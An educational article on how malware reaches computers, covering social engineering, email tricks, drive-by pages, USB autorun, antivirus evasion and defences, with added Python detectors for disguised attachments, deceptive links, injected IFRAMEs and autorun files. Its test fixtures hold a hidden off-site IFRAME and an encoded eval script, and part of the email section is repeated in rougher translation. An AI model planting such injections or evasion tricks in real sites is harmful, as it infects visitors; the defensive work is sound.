
Methods of malware penetration into a system

A necessary task for virus writers and cybercriminals is to get a virus, worm or Trojan horse onto a victim's computer or mobile phone. This goal is achieved in various ways, which fall into two main categories:

  • social engineering;
  • techniques for injecting malicious code into the target system without the user's knowledge.

Often these methods are used together. In addition, special measures are frequently taken to counteract anti-virus programs.

Social engineering

Social engineering methods in one way or another force the user to run an infected file or open a link to an infected website. These methods are used not only by numerous mail worms, but also by other types of malicious software.

The task of hackers and virus writers is to draw the user's attention to an infected file (or an HTTP link to an infected file), to arouse interest, and to entice the user into clicking on the file (or on the link to it). The "classic of the genre" is the LoveLetter mail worm, which caused a sensation in May 2000 and, according to Computer Economics, still holds the record for financial damage. The message that the worm displayed on the screen looked like this:

Many people responded to the "I LOVE YOU" confession, and as a result the mail servers of large companies could not withstand the load: each time the attached VBS file was opened, the worm sent copies of itself to every contact in the address book.

The Mydoom mail worm, which erupted across the Internet in January 2004, used texts imitating technical messages from a mail server.

Also worth mentioning is the Swen worm, which posed as a message from Microsoft and disguised itself as a patch fixing a number of new Windows vulnerabilities (it is not surprising that many users heeded the call to install "another patch from Microsoft").

Curious incidents also occur; one took place in November 2005. One version of the Sober worm claimed that the German criminal police were investigating visits to illegal websites. This letter reached a consumer of child pornography, who took it for an official letter and obediently turned himself in to the authorities.

Recently it is not files attached to an email but links to files hosted on an infected site that have become particularly popular. A message is sent to the potential victim by mail, via ICQ or another instant messenger, less often via IRC chats (for mobile viruses the usual delivery method is SMS). The message contains attractive text that encourages an unsuspecting user to click on the link. This method of penetrating victims' computers is by far the most popular and effective today, as it bypasses vigilant anti-virus filters on mail servers.

The possibilities of file-sharing networks (P2P networks) are also used. A worm or Trojan is posted on the P2P network under a variety of "delicious" names, for example:

  • AIM & AOL Password Hacker.exe
  • Microsoft CD Key Generator.exe
  • play station emulator crack.exe

In search of new programs, P2P users stumble upon these names, download the files, and run them for execution.

Another quite popular technique is the "con", when the victim is offered a free utility or instructions for cheating various payment systems. For example, they are offered free Internet or mobile access, a credit-card number generator, a way to increase the balance of a personal online wallet, and so on. Naturally, victims of such fraud are unlikely to go to law enforcement agencies (after all, they themselves were trying to make money by fraudulent means), and Internet criminals take full advantage of this.

An unusual variant of this con was used by an unknown attacker from Russia in 2005-2006. A Trojan was sent to addresses found on the job.ru website, which specializes in employment and personnel search. Some of those who had posted their resumes there received a supposed job offer with a file attached, which they were asked to open and read. The file was, of course, a Trojan. It is also interesting that the attack targeted mainly corporate email addresses. The calculation, apparently, was that company employees would be unlikely to report the source of infection. And so it happened: for more than six months, Kaspersky Lab specialists could not obtain clear information about how the Trojan had got onto users' computers.

There are also quite exotic cases, for example a letter with an attached document in which a bank client is asked to confirm (or rather, to disclose) their access codes: print the document, fill in the attached form and then fax it to the phone number given in the letter.

Another unusual case, of home delivery of spyware, occurred in Japan in the autumn of 2005. Attackers sent CDs infected with a Trojan spyware program to the home addresses (city, street, house) of customers of a Japanese bank, using the bank's previously stolen customer database.

Injection techniques

Attackers use these techniques to inject malicious code into a system without attracting the attention of the computer's owner. This is done through vulnerabilities in the security of operating systems and software. A vulnerability allows a network worm or Trojan created by an attacker to penetrate a victim's computer and launch itself without any user action.

Vulnerabilities are, in essence, errors in the code or in the logic of programs. Modern operating systems and applications have a complex structure and extensive functionality, and it is simply impossible to avoid mistakes in their design and development. This is what virus writers and cybercriminals exploit.

Vulnerabilities in the Outlook email client were exploited by the Nimda and Aliz email worms. To launch the worm's file, it was enough to open an infected letter or simply to hover the cursor over it in the preview pane.

Malicious programs have also actively exploited vulnerabilities in the network components of operating systems. CodeRed, Sasser, Slammer, Lovesan (Blaster) and many other worms for Windows used such vulnerabilities to spread. Linux systems were also affected: the Ramen and Slapper worms penetrated computers through vulnerabilities in that operating environment and its applications.

In recent years, one of the most popular infection methods has been the injection of malicious code through web pages, often exploiting vulnerabilities in Internet browsers. An infected file and a script exploiting a browser vulnerability are placed on a web page. When a user visits the infected page, the script is triggered and, through the vulnerability, downloads the infected file onto the computer and launches it. So to infect a large number of computers it is enough to lure as many users as possible to such a page. This is achieved in various ways: by sending spam with the page's address, by sending similar messages through instant messengers, and sometimes even with the help of search engines. The infected page contains various text which is sooner or later indexed by search engines, and a link to the page appears among other pages in the search results.

A separate class is Trojans designed to download and run other Trojans. These Trojans, which are usually very small, get onto the victim's computer in one way or another (for example, through yet another vulnerability in the system) and then independently download other malicious components from the Internet and install them. Often such Trojans change browser settings to the least secure ones in order to "smooth the road" for other Trojans.

Vulnerabilities that become known are quickly fixed by the software vendors, but information about new vulnerabilities constantly appears and is immediately put to use by numerous hackers and virus writers. Many Trojan bots use new vulnerabilities to grow their numbers, and new bugs in Microsoft Office are immediately used to plant ordinary Trojan programs on computers. Unfortunately, there is also a tendency for the interval between the publication of a new vulnerability and its first use by worms and Trojans to shrink. As a result, both the vendors of vulnerable software and anti-virus developers find themselves under time pressure: the former must fix the error as quickly as possible, test the result (usually called a "patch") and deliver it to users, while the latter must immediately release a tool for detecting and blocking the objects (files, network packets) that exploit the vulnerability.

Combined use of injection techniques and social engineering

Quite often, attackers use both at once: a social engineering method to attract the attention of the potential victim, and a technical one to increase the likelihood that the infected object penetrates the system.

For example, the Mimail mail worm was distributed as an email attachment. To make the user pay attention to the message, specially formatted text was inserted into it, and to launch the copy of the worm from the ZIP archive attached to the message, a vulnerability in Internet Explorer was used. As a result, when the file was opened from the archive, the worm created a copy of itself on disk and launched it without any system warnings or additional user actions. Incidentally, this worm was one of the first designed to steal the personal data of users of e-gold Internet wallets.

Another example is a spam mailing with the subject "Hello" and the text "Look what they write about you", followed by a link to a web page. Analysis showed that this web page contained a script which, using yet another vulnerability in Internet Explorer, downloaded the LdPinch Trojan, designed to steal various passwords, onto the user's computer.

Countering anti-virus programs

Since the goal of cybercriminals is to get malicious code onto victims' computers, they need not only to make the user run an infected file or to penetrate the system through a vulnerability, but also to slip past the installed anti-virus filter unnoticed. It is therefore not surprising that attackers deliberately fight anti-virus programs. The techniques they use are very diverse, but the most common are the following:

Packing and code encryption. A significant proportion (if not the majority) of modern computer worms and Trojans are packed or encrypted in one way or another. Moreover, the computer underground creates packing and encryption utilities specially for this purpose. For example, absolutely all files found on the Internet that had been processed by the utilities CryptExe, Exeref, PolyCrypt and some others turned out to be malicious.

To detect such worms and Trojans, anti-virus programs must either add new unpacking and decryption methods or add a signature for each malware sample, which reduces detection quality, since not all possible samples of the modified code end up in the hands of the anti-virus company.

Code mutation. The Trojan's code is diluted with "garbage" instructions. As a result, the Trojan's functionality is preserved, but its "appearance" changes significantly. Periodically there are cases where code mutation occurs in real time, every time a Trojan is downloaded from an infected website, i.e. all or a significant proportion of the Trojan samples that reach computers from such a site differ from one another. An example of this technique is the Warezov mail worm, several versions of which caused significant epidemics in the second half of 2006.

Hiding its presence. So-called "rootkit technologies", commonly used in Trojans. System functions are intercepted and replaced, so that the infected file is visible neither to the standard tools of the operating system nor to anti-virus programs. Sometimes the registry branches where a copy of the Trojan is registered and other system areas of the computer are hidden as well. These techniques are actively used, for example, by the HacDef backdoor Trojan.

Stopping the anti-virus and blocking anti-virus database updates. Many Trojans and network worms take special actions against anti-virus programs: they look for them in the list of running applications and try to stop them, corrupt anti-virus databases, block updates, and so on. Anti-virus programs have to protect themselves in corresponding ways: monitor the integrity of their databases, hide their processes from Trojans, etc.

Hiding code on websites. The addresses of web pages hosting Trojan files sooner or later become known to anti-virus companies. Naturally, such pages come under the close attention of anti-virus analysts: the page content is downloaded periodically and new versions of the Trojans are added to anti-virus updates. To counter this, the web page is modified in a special way: if the request comes from an anti-virus company's address, a non-Trojan file is served instead of the Trojan.

Attack by numbers. Generation and distribution of a large number of new Trojan versions over a short period of time. As a result, anti-virus companies are flooded with new samples that take time to analyse, which gives the malicious code an additional chance to infiltrate computers successfully.

These and other methods are used by the computer underground to counter anti-virus programs. The activity of cybercriminals grows year after year, and today one can speak of a real "technology race" between the anti-virus industry and the virus industry. At the same time, the number of individual hackers and criminal groups is growing, as is their professionalism. All this greatly increases the complexity and volume of work that anti-virus companies must do to develop sufficient protection tools.

Email

Email remains one of the main sources of malware infiltration into corporate networks. There are several main uses for email as a means of carrying malware:

  • distribution of malware "in its pure form": the malware is an attachment to the letter, and no automatic launch is provided. The malicious program is launched by the user himself, for which elements of social engineering are often used in the letter. The attached malware is not necessarily an executable file; there are often malicious scripts, such as Worm.Win32.Feebs, which is sent by mail as an HTA file containing an encrypted script that downloads an executable from the Internet;
  • a malicious program with a modified extension: this method differs from the previous one in that the executable file attached to the letter has a double extension, for example Document.doc .pif. In this case spaces are used to mask the real file extension, and their number can vary from 10-15 to hundreds. A more original method of masking is to use the *.com extension: as a result the user may mistake the attached file for a link to a site. For example, a file named www.playboy.com will most likely be taken for a link to the site, not for an attached file with the name www.playboy and the extension *.com;
  • malware in an archive: archiving is an additional layer of protection against anti-virus scanners, and the archive can be deliberately damaged (but not so badly that the malicious file cannot be extracted) or encrypted with a password. If the archive is password-protected, the password is placed in the body of the message as text or as an image; this technique was used, for example, in the Bagle mail worm. Launching the malicious program in this case relies solely on the curiosity of the user, who must manually enter the password and then run the extracted file;
  • a letter in HTML format with an exploit that launches an embedded malicious program: such mail viruses are rare today, but in 2001-2003 they were widespread (typical examples are Email-Worm.Win32.Avron, Email-Worm.Win32.BadtransII, Net-Worm.Win32.Nimda);
  • a letter with a link to a malicious object.
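The attachment-name disguises described above can be caught before the user ever sees the letter. The following is an added example, not code from the original article: it flags a dangerous final extension, a "double extension" whose real extension is pushed out of view by spaces (Document.doc .pif), and a .com executable named like a web address; the extension lists and the sample names are assumptions constructed for the example.

```python
"""Heuristics for disguised attachment filenames (added example)."""
from __future__ import annotations

import re

# Extensions that Windows runs directly on double-click (assumed list, not exhaustive).
EXECUTABLE_EXTENSIONS = {
    "exe", "com", "pif", "scr", "bat", "cmd", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "hta", "lnk", "msi",
}

# Extensions a user reads as "just a document or picture" (assumed list).
DOCUMENT_EXTENSIONS = {
    "doc", "docx", "xls", "xlsx", "pdf", "rtf", "txt", "jpg", "jpeg", "gif",
    "png", "mp3", "avi", "zip", "rar",
}

# "<name>.<shown-ext><optional spaces>.<real-ext>" at the end of the name.
DOUBLE_EXT_RE = re.compile(r"\.(\w+)(\s*)\.(\w+)$")

# A whole filename that looks like a hostname ending in .com, e.g. www.example.com.
URL_LOOKALIKE_RE = re.compile(r"^www\.[\w.-]+\.com$", re.IGNORECASE)


def classify_attachment(name: str) -> list[str]:
    """Return the disguise tags found in an attachment filename.

    Tags: "executable", "double-extension", "url-lookalike".
    An empty list means none of the three heuristics fired.
    """
    tags: list[str] = []
    stripped = name.rstrip()  # trailing spaces never survive on disk

    # 1. Windows decides how to open the file by its *last* extension only.
    _, _, final_ext = stripped.rpartition(".")
    final_ext = final_ext.lower()
    if final_ext in EXECUTABLE_EXTENSIONS:
        tags.append("executable")

    # 2. A harmless-looking extension, optional padding, then the real one.
    m = DOUBLE_EXT_RE.search(stripped)
    if m:
        shown_ext, real_ext = m.group(1).lower(), m.group(3).lower()
        if shown_ext in DOCUMENT_EXTENSIONS and real_ext in EXECUTABLE_EXTENSIONS:
            tags.append("double-extension")

    # 3. A .com executable dressed up as a web address.
    if final_ext == "com" and URL_LOOKALIKE_RE.match(stripped):
        tags.append("url-lookalike")
    return tags


def triage(names: list[str]) -> dict[str, list[str]]:
    """Classify each name; only names that trip at least one heuristic are returned."""
    return {n: t for n in names if (t := classify_attachment(n))}


# Constructed sample attachment names (not real malware).
SAMPLE_NAMES = [
    "quarterly_report.pdf",
    "Document.doc                    .pif",
    "www.playboy.com",
    "holiday.jpg.exe",
    "notes.txt",
]

if __name__ == "__main__":
    for name, tags in triage(SAMPLE_NAMES).items():
        print(f"{name!r:45} -> {', '.join(tags)}")
```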

Letters with a link to a malicious object have recently become widespread, so this method deserves closer consideration. It relies on the fact that the letter itself contains no malicious code, so the mail antivirus cannot detect it and block delivery of the letter. The text of the letter is prepared using social engineering methods and aims to persuade the user to open the link in the body of the letter. A typical example is a message disguised as a greeting card (Fig. 1).

Fig. 1. "Greeting card"

The figure shows a very crude fake: it is clear that the letter came from some unintelligible address, and a link with an IP address instead of a site name does not inspire confidence. Nevertheless, according to the author's statistics, thousands of users "bite" on such letters. A better-made fake greeting card is shown in Fig. 2.

Fig. 2. A higher-quality fake postcard

In this case it is much harder to recognize the fake: visually, the letter really came from the postcard.ru service, and the link to the postcard page appears to lead to that site. Here the deception relies on the fact that the letter is in HTML format and the link is made with the standard <a> tag. As you know, a link built with this tag looks like this:

<a href="URL">text description</a>

The text description can be arbitrary, since it has nothing to do with the URL that is actually opened. So in this letter the text description of the link is www.postcard.ru/card.php?4295358104, while the real link points to a completely different resource. This technique is trivial to implement and easily misleads the user.
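The check a mail gateway or user-awareness tool can make for this trick is to compare the host named in the visible link text with the host in the href. The following is an added example, not code from the original article: it extracts every <a href> with its anchor text from an HTML body and flags a pair when the text names a different host, or when the destination is a bare IP address (the crude fake of Fig. 1). The sample message is constructed; 203.0.113.x is a documentation-only address range.

```python
"""Detect HTML e-mail links whose visible text impersonates another address (added example)."""
from __future__ import annotations

import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlparse

# Anchor text that starts like an address: optional scheme, optional www., dotted labels.
HOST_IN_TEXT_RE = re.compile(r"^(?:https?://)?(?:www\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def _strip_www(host: str) -> str:
    return host[4:] if host.startswith("www.") else host


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in the body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: list[tuple[str, str]] = []
        self._href: Optional[str] = None   # href of the <a> we are currently inside
        self._text: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:         # text (possibly nested in <b> etc.) inside the link
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of_href(href: str) -> str:
    """Real destination host, lower-cased, without a leading 'www.'."""
    url = href if "://" in href else "http://" + href
    return _strip_www((urlparse(url).hostname or "").lower())


def host_shown_in_text(text: str) -> Optional[str]:
    """Host the user *thinks* the link goes to, if the text looks like an address."""
    m = HOST_IN_TEXT_RE.match(text)
    return m.group(1).lower() if m else None


def find_deceptive_links(html: str) -> list[dict]:
    """Return one finding per link whose text and destination disagree or whose host is an IP."""
    collector = LinkCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for href, text in collector.links:
        real = host_of_href(href)
        shown = host_shown_in_text(text)
        reasons = []
        if shown and shown != real:
            reasons.append("text shows a different host")
        if IPV4_RE.match(real):
            reasons.append("destination is a bare IP address")
        if reasons:
            findings.append({"text": text, "href": href, "shown_host": shown,
                             "real_host": real, "reasons": reasons})
    return findings


# Constructed sample message modelled on the fake postcard described in the text.
SAMPLE_MAIL = """
<html><body>
<p>You have received an animated card!</p>
<p>To view it, open
<a href="http://203.0.113.5/card.php?4295358104">www.postcard.ru/card.php?4295358104</a>
</p>
<p><a href="http://www.postcard.ru/help">Help</a> |
<a href="http://203.0.113.9/">click here</a></p>
</body></html>
"""

if __name__ == "__main__":
    for f in find_deceptive_links(SAMPLE_MAIL):
        print(f"{f['text']!r} -> {f['href']}: {'; '.join(f['reasons'])}")
```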

  • the link leads directly to the malware executable. This is the simplest case: when opening the link, the user is asked what to do with the file, save or run. Choosing "run" launches the malicious code and compromises the PC. Practice shows that users usually do not think about the danger. The most recent example is the malicious program Virus.VBS.Agent.c, which destroys files on disk (which is why it is classified as a Virus) and spreads by sending "greeting cards" by e-mail with a link to its executable file, hosted directly on the virus author's website. The large number of users affected by this virus is a clear demonstration of the effectiveness of this method;
  • a link to a site disguised as the site of a legitimate program. A typical example is programs for "hacking" mobile operators and mailboxes, which often have a home page, plausible documentation and an installation package;
  • the link leads to an HTML page with an exploit. This is a common option (at the time of writing the author recorded a real epidemic of such letters), and it is more dangerous than a direct link to an executable, since such a link is very hard to detect and block from proxy server logs. If successful, the exploit downloads malicious code, and as a result more than ten malicious programs may be installed on the affected computer. The usual set: mail worms, a password-stealing Trojan, and a set of Trojan-Spy and Trojan-Proxy class Trojans.

Measures to protect against malware distributed by e-mail are fairly obvious. At a minimum, an antivirus should be installed on the mail server (or, when choosing a hosting provider, attention should be paid to the anti-virus protection of its mail). In addition, a number of other measures should be taken:

  • explain to users why it is dangerous to open programs attached to emails and the links contained in them. It is very useful to teach users to identify the real URL behind a link;
  • where technically possible, block the sending and receiving of emails with attached executable files and encrypted archives. At Smolenskenergo, for example, such blocking has been in place for a long time and has proved highly effective (blocked messages are quarantined and can be retrieved by the administrator);
  • set up filters that block emails by content and keep them up to date. Such filters are effective against emails containing links to malware, which are usually easy to filter by keywords such as "Animated card" or "postcard". A side effect is the blocking of genuine greeting cards and similar letters; a compromise is to install such a filter in the anti-spam system and mark the letters as spam.

Internet

In terms of the number of investigated incidents, the Internet is also one of the main sources of malware penetration into the network. There are several main methods widely used by attackers:

  • all kinds of cracks and serial number generators. Statistics show that when searching for a key or crack on hacker sites, the probability of infecting the computer with malware is very high. Moreover, such a program can be downloaded in an archive together with the crack, or picked up while browsing the site as a result of exploits and malicious scripts on hacker sites. Countermeasures: blocking access to hacker sites at the proxy server level and prohibiting visits to them in the security policy and other governing documents of the company;
  • hacked legitimate sites. According to statistics, site hacking has recently become more frequent and follows standard schemes. A small piece of code is injected into the HTML of the infected site's pages, usually an IFRAME tag leading to a page with an exploit, or an encrypted script that in one way or another redirects the user to an infected site (the IFRAME tag may be inserted into the page body dynamically, the user redirected to an exploit page, etc.). The main danger is that the hacking of a site cannot be predicted, and accordingly it is very difficult to protect the user from it (Fig. 3).

Fig. 3. Exploit code added to the end of an HTML page on a hacked site

As the figure shows, the exploit code was added to the end of the HTML page by automated means and takes the form of an encrypted script. Encrypting the script makes it harder to analyse, but its main purpose is to evade signature detection. In more complex cases the malicious insert is placed within the page code, which makes it harder to detect.
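A site owner can look for exactly the pattern in Fig. 3 in their own pages: markup appended after the page's closing tag, an IFRAME that is hidden or points off-site, and a script that is mostly an encoded blob handed to eval or unescape. The following is an added example, not code from the original article; the thresholds, finding names and sample page are constructed, and the encoded blob in the sample decodes to the harmless text "var s=document;" and exists only to exercise the detector.

```python
"""Scan an HTML page for appended hidden IFRAMEs and encoded decode-and-run scripts (added example)."""
from __future__ import annotations

import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlparse

ESCAPE_RE = re.compile(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
DECODE_EXEC_RE = re.compile(r"\b(eval|unescape|document\.write|String\.fromCharCode)\s*\(")
ENCODED_BLOB_THRESHOLD = 10   # escape sequences in one script before we call it a blob (assumed)


def _strip_www(host: str) -> str:
    return host[4:] if host.startswith("www.") else host


class PageScanner(HTMLParser):
    """Emit (finding, detail) pairs while parsing; site_host is the page's own host."""

    def __init__(self, site_host: str) -> None:
        super().__init__()
        self.site_host = _strip_www(site_host.lower())
        self.findings: list[tuple[str, str]] = []
        self._script: Optional[list[str]] = None   # buffer while inside <script>
        self._html_closed = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if self._html_closed:   # anything after </html> was not written by the page author's template
            self.findings.append(("after-html-close", f"<{tag}> appended after </html>"))
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self._check_script("".join(self._script))
            self._script = None
        elif tag == "html":
            self._html_closed = True

    def _check_iframe(self, a: dict[str, str]) -> None:
        host = _strip_www((urlparse(a.get("src", "")).hostname or "").lower())
        if host and host != self.site_host:
            self.findings.append(("offsite-iframe", f"iframe loads {host}"))
        style = a.get("style", "").replace(" ", "").lower()
        zero = {"0", "0px"}
        if (a.get("width") in zero or a.get("height") in zero
                or "display:none" in style or "visibility:hidden" in style):
            self.findings.append(("hidden-iframe", "iframe has zero size or is hidden"))

    def _check_script(self, code: str) -> None:
        escapes = len(ESCAPE_RE.findall(code))
        calls = set(DECODE_EXEC_RE.findall(code))
        if escapes >= ENCODED_BLOB_THRESHOLD:
            self.findings.append(("encoded-script", f"{escapes} escape sequences"))
            if calls & {"eval", "document.write"}:   # decoded text is executed, not displayed
                self.findings.append(("decode-and-execute", "blob passed to " + ", ".join(sorted(calls))))


def scan_page(html: str, site_host: str) -> list[tuple[str, str]]:
    scanner = PageScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a normal page with a hidden off-site iframe and an encoded script appended.
SAMPLE_PAGE = """<html><head><title>Company news</title></head>
<body><h1>News</h1><p>Welcome to our site.</p>
<iframe src="http://www.example-corp.test/banner.html" width="468" height="60"></iframe>
</body></html>
<iframe src="http://203.0.113.7/in.php" width="0" height="0" frameborder="0"></iframe>
<script>eval(unescape('%76%61%72%20%73%3d%64%6f%63%75%6d%65%6e%74%3b'))</script>
"""

if __name__ == "__main__":
    for finding, detail in scan_page(SAMPLE_PAGE, "www.example-corp.test"):
        print(f"{finding:20} {detail}")
```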

Protection against exploits in web pages comes down to prompt installation of operating system and browser updates. In addition, running the browser with the lowest possible privileges gives good results, since it can significantly reduce the damage if an exploit succeeds.

Flash media

Media of this type are now very widely used: flash drives and flash cards, USB hard drives, mobile phones, cameras, voice recorders. The proliferation of these devices leads to a growing number of malicious programs that use them as a means of transfer. There are three basic ways of infecting a flash drive:

  • creating an autorun.inf file in the root of the drive that launches the malicious program, which may be placed anywhere on the drive (not necessarily in the root). autorun.inf on a flash drive works exactly as on a CD-ROM: when the drive is connected or opened in Explorer, the malicious program is launched;
  • creating, in the root of the drive or in existing folders, files whose names and icons resemble other files or folders. The author conducted an experiment: a harmless executable with an icon visually indistinguishable from a folder icon and the name MP3 was placed on the flash drives of the participating users. Users immediately took an interest in the new "folder" and tried to view its contents by double-clicking it, which launched the executable;
  • using the "companion virus" principle. Essentially this is the same as the previous method, but here the malicious program creates many copies of itself whose names match the names of files or folders on the flash drive.
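The first and third of these can be checked offline from a drive's autorun.inf and its directory listing. The following is an added example, not code from the original article: it lists the [autorun] entries that cause code to run and finds executables whose names shadow a folder or a document on the same drive. The executable extension list is an assumption, and the sample autorun.inf and listing are constructed and contain nothing malicious.

```python
"""Check a removable drive listing for autorun launch entries and companion executables (added example)."""
from __future__ import annotations

import configparser
from pathlib import PureWindowsPath

# Extensions Windows executes on double-click (assumed list, not exhaustive).
EXECUTABLE_SUFFIXES = {".exe", ".com", ".pif", ".scr", ".bat", ".cmd", ".vbs", ".js", ".hta", ".lnk"}


def autorun_launch_targets(inf_text: str) -> list[tuple[str, str]]:
    """Return (key, command) pairs from [autorun] that cause code to run.

    Covers open=, shellexecute= and every shell\\<verb>\\command= entry; the
    latter runs when the user picks that verb (or double-clicks, if shell=
    makes it the default verb). Non-launching keys such as icon= are ignored.
    """
    # strict=False tolerates duplicate keys; interpolation=None keeps %SystemRoot% literal.
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(inf_text)
    targets = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, value in cp.items(section):   # keys are lower-cased by ConfigParser
            launches = key in ("open", "shellexecute") or (
                key.startswith("shell\\") and key.endswith("\\command"))
            if launches:
                targets.append((key, value.strip()))
    return targets


def find_companions(files: list[str], dirs: list[str]) -> list[tuple[str, str, str]]:
    """Executables named like a folder or like a non-executable file on the same drive.

    Returns (executable, kind, shadowed_name) with kind "folder-lookalike"
    (MP3.exe next to a folder MP3) or "file-companion" (Report.exe next to Report.doc).
    """
    dir_by_name = {d.lower(): d for d in dirs}
    files_by_stem: dict[str, list[str]] = {}
    for f in files:
        files_by_stem.setdefault(PureWindowsPath(f).stem.lower(), []).append(f)

    findings = []
    for f in files:
        p = PureWindowsPath(f)
        if p.suffix.lower() not in EXECUTABLE_SUFFIXES:
            continue
        stem = p.stem.lower()
        if stem in dir_by_name:
            findings.append((f, "folder-lookalike", dir_by_name[stem]))
        for other in files_by_stem.get(stem, []):
            if other != f and PureWindowsPath(other).suffix.lower() not in EXECUTABLE_SUFFIXES:
                findings.append((f, "file-companion", other))
    return findings


# Constructed sample: autorun.inf pointing into a subfolder, plus a listing of the drive root.
SAMPLE_AUTORUN = r"""[AutoRun]
open=Music\player.exe
shell\open\command=Music\player.exe
shell\open=Open
icon=%SystemRoot%\system32\shell32.dll,4
"""
SAMPLE_FILES = ["MP3.exe", "Report.doc", "Report.exe", "readme.txt", "autorun.inf"]
SAMPLE_DIRS = ["MP3", "Photos", "Music"]

if __name__ == "__main__":
    print("autorun launches:", autorun_launch_targets(SAMPLE_AUTORUN))
    print("companions:", find_companions(SAMPLE_FILES, SAMPLE_DIRS))
```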

The techniques for protecting against the spread of malware on flash media are quite simple:

  • install anti-virus protection with a real-time file monitor on users' computers;
  • disable autorun, which is an effective protective measure;
  • on strategically important PCs, block the use of flash media altogether. Blocking can be done mechanically (disabling USB ports and sealing them) or logically, with special software;
  • write local security policies that block the launch of applications from a flash drive.

Notebooks and PDAs

Mobile computers are another malware vector. A typical situation is using a laptop on a business trip, when it is usually connected to someone else's network. In the course of this work the laptop may become infected, most often with a network worm. When the infected laptop is connected to its "home" network, the PCs on it may be infected. It is difficult to protect against this; the set of measures boils down to the following:

  • installing an antivirus and a firewall on the laptop, with the administrator periodically checking that they are working;
  • checking the laptop before connecting it to the network, although this is not always technically possible, takes a lot of time and reduces the user's mobility;
  • creating a special "guest" subnet for laptops and taking measures to protect the main LAN from this subnet.

Protecting a corporate network from malware is a complex task, because malware is constantly modified and improved to bypass existing protection systems. This article has focused on the main ways in which malicious software penetrates the network and the corresponding protection methods. When considering protection methods, it is assumed that the network is protected by a firewall and access to network computers from outside is blocked.

Email

Email remains one of the main sources of malware infiltration into corporate networks. There are several main uses for email as a means of carrying malware:

  • distribution of malware "in its pure form" - in this case, malware is an attachment to the letter and its automatic launch is not provided. The launch of the malicious program is carried out by the user himself, for which elements of social engineering are often used in the letter. Attached malware is not necessarily an executable file - there are often malicious scripts, such as Worm.Win32.Feebs, which are sent by mail as HTA files containing an encrypted script that downloads an executable file from the Internet;
  • a malicious program with a modified extension - this method differs from the previous one in that the executable file attached to the letter has a double extension, for example Document.doc .pif. In this case, spaces are used to mask the real file extension and their number can vary from 10-15 to hundreds. A more original method of masking is to use the *.com extension - as a result, the attached file may be mistakenly considered by the user as a link to the site, for example www.playboy.com, the user will most likely consider it a link to the site, and not an attached file with the name www.playboy and extension *.com;
  • malware in the archive - archiving is an additional layer of protection against virus scanners, and the archive can be deliberately damaged (but not so much that a malicious file cannot be extracted from it) or encrypted with a password. If the archive is protected with a password, the latter is placed in the body of the message in the form of text or an image - a similar technique, for example, was used in the Bagle mail worm. The launch of a malicious program in this case is possible solely due to the curiosity of the user, who needs to manually enter the password and then run the extracted file;
  • a letter in html format with an exploit to launch an embedded malicious program - at present, such mail viruses are rare, but in 2001-2003 they were widespread (typical examples are Email-Worm.Win32.Avron, Email-Worm.Win32. BadtransII, Net-Worm.Win32.Nimda);
  • email with a link to a malicious object.

Letters with a link to a malicious object have recently become widespread, so this method deserves more detailed consideration. It is based on the fact that there is no malicious code in the letter, and therefore, the mail antivirus cannot detect it and block the forwarding of the letter. The text of the letter is prepared using social engineering methods and is aimed at persuading the user to open the link in the body of the letter. Typical examples are disguise as a greeting card (Fig. 1).

Rice. 1. "Greeting card"

The figure shows a very crude fake: it is clearly seen that the letter came from some incomprehensible address, and the link with the IP address instead of the site name does not inspire confidence. Nevertheless, according to the author's statistics, thousands of users "catch" on such letters. A better version of the fake greeting card message is shown in Fig. 2.

Rice. 2. Higher quality fake postcard

In this case, it is much more difficult to recognize a fake: visually, the letter really came from the postcard.ru service and the link to the postcard page leads to this site. In this case, the deception is based on the fact that the letter is in html format and the link is made with a standard tag . As you know, the design of a link using this tag looks like this:

text description

The text description can be arbitrary, as it has nothing to do with the opened URL. Therefore, in this letter, the text description of the link is www.postcard.ru/card.php?4295358104, while the real link points to a completely different resource. This technique is elementary implemented and easily misleads the user.

  • the link leads directly to the malware executable - this is the simplest case. When opening this link, the user will be prompted what to do with the file under this link: save or run. Selecting "run" leads to the launch of malicious code and the defeat of the PC. Practice shows that users usually do not think about the danger. The most recent example is the malicious program Virus.VBS.Agent.c, which destroys files on a disk (in fact, because of this it is classified as a Virus) and spreads itself by sending "greeting cards" by e-mail with a link to its executable. a file hosted directly on the website of the virus developer. A large number of users affected by this virus is a clear example of the effectiveness of this method;
  • a link to a site disguised as a site of a legitimate program. A typical example is programs for "hacking" cellular providers and mailboxes, which often have a home page, plausible documentation and an installation package;
  • the link leads to the html page with the exploit. This is a common option (at the time of writing the article, the author recorded a real epidemic of such letters), and it is more dangerous than a direct link to an executable file, since such a link is very difficult to detect and block by proxy protocols. If successful, the exploit downloads malicious code, and as a result, more than ten malicious programs can be installed on the affected computer. The usual set: mail worms, a password-stealing Trojan, a set of Trojans of the Trojan-Spy and Trojan-Proxy class.

Measures to protect against malicious programs distributed by e-mail are fairly obvious. At a minimum, install an antivirus on the mail server (or, when choosing a hosting provider, check what anti-virus mail protection it offers). In addition, a number of other measures should be taken:

  • explain to users why it is dangerous to open programs attached to e-mail and links contained in it. It is very useful to teach users to identify the real target URL of a link;
